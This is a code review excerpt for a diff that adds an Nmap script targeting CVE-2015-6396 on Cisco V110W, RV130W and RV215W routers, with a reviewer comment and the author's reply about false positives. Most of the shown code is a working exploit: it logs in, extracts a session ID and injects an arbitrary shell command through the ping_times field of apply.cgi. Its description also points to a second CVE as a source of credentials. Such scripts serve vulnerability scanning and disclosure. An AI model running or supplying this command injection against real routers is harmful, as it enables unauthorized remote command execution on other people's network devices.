scripts/http-vuln-cve2015-6396.nse

```diff
@@ -0,0 +1,126 @@
+  local pwd = stdnse.get_script_args(SCRIPT_NAME .. '.pwd')
+  local cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd')
+  
+  stdnse.debug1('Given user: %s', user)
+  stdnse.debug1('Given pwd: %s', pwd)
+  stdnse.debug1('Given cmd: %s', cmd)
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local vuln = {
+    title = 'Remote Code Execution Cisco V110W, RV130W and RV215W (CVE-2015-6396)',
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+A remote code execution vulnerability exists on the CLI command parser which allows local users
+to execute arbitrary shell commands as an administrator via crafted parameters. Authentication
+is required. You can possibly get the device credentials by exploiting the CVE-2014-0683
+vulnerability on the device.
+    ]],
+    IDS = {CVE = 'CVE-2015-6396'},
+    references = {
+      'https://nvd.nist.gov/vuln/detail/CVE-2015-6396'
+    },
+    dates = {
+      disclosure = {year = '2015', month = '08', day = '07'},
+    }
+  }
+
+  -- prepare headers for request to get the session id
+  local options = {header={}}
+  options['header']['Origin'] = url
+  options['header']['Upgrade-Insecure-Requests'] = 1
+  options['header']['Content-Type'] = 'application/x-www-form-urlencoded'
+  options['header']['User-Agent'] = 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)'
+  options['header']['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
+  options['header']['Referer'] = url
+  options['header']['Accept-Encoding'] = 'gzip, deflate'
+  options['header']['Accept-Language'] = 'en-US,en;q=0.9'
+  options['header']['Cookie'] = 'SessionID='
+
+  -- prepare data for request to get the session id
+  local data = string.format('gui_action=&wait_time=0&pwd=%s&enc=1&submit_type=&user=%s&submit_button=login&change_action=&sel_lang=EN', pwd, user)
+
+  -- make request to get the session id
+  local response = http.post(host, port, uri .. 'login.cgi', options, nil, data)
+  
+  -- parse response to get the session id
+  local session_id = response.body:match(';session_id=(.-)";')
+  if not session_id then
+    stdnse.debug1('Checking the second pattern of the session_id...')
+    session_id = response.body:match('var session_id = "(.-)";')
+
+    if not session_id then
+      stdnse.debug1('Session ID could not be found.')
+      return vuln_report:make_output(vuln)
+    end
+  end
+
+  stdnse.debug1('Got session ID: %s', session_id)
+
+  -- prepare data for request to execute the cmd
+  data = 'ping_size=64&submit_button=Diagnostics&traceroute_ip=&gui_action=&ping_ip=127.0.0.1&lookup_name=&ping_times=3+%7C' .. cmd .. '%7C&wait_time=4&submit_type=start_ping&change_action=gozila_cgi&commit=1'
+
+  -- make request to execute the command
+  local response = http.post(host, port, uri .. 'apply.cgi;session_id=' .. session_id, options, nil, data)
+
+  if response.status and response.body then
+    if response.status == 200 then
```

Comment:
This is not sufficient to determine a server is vulnerable. Many servers return 200 OK for any path requested. As it is now, the script will make all those servers as vulnerable.

Reply:
If the exploitation fails, it returns a 400 HTTP status code and non-existing URIs return 404.
However, I have to add a condition for the case session_id obtained by the previous request is invalid.
Also, we cannot be aware of a cmd failure (command does not exist, or invalid syntax), as its a blind RCE.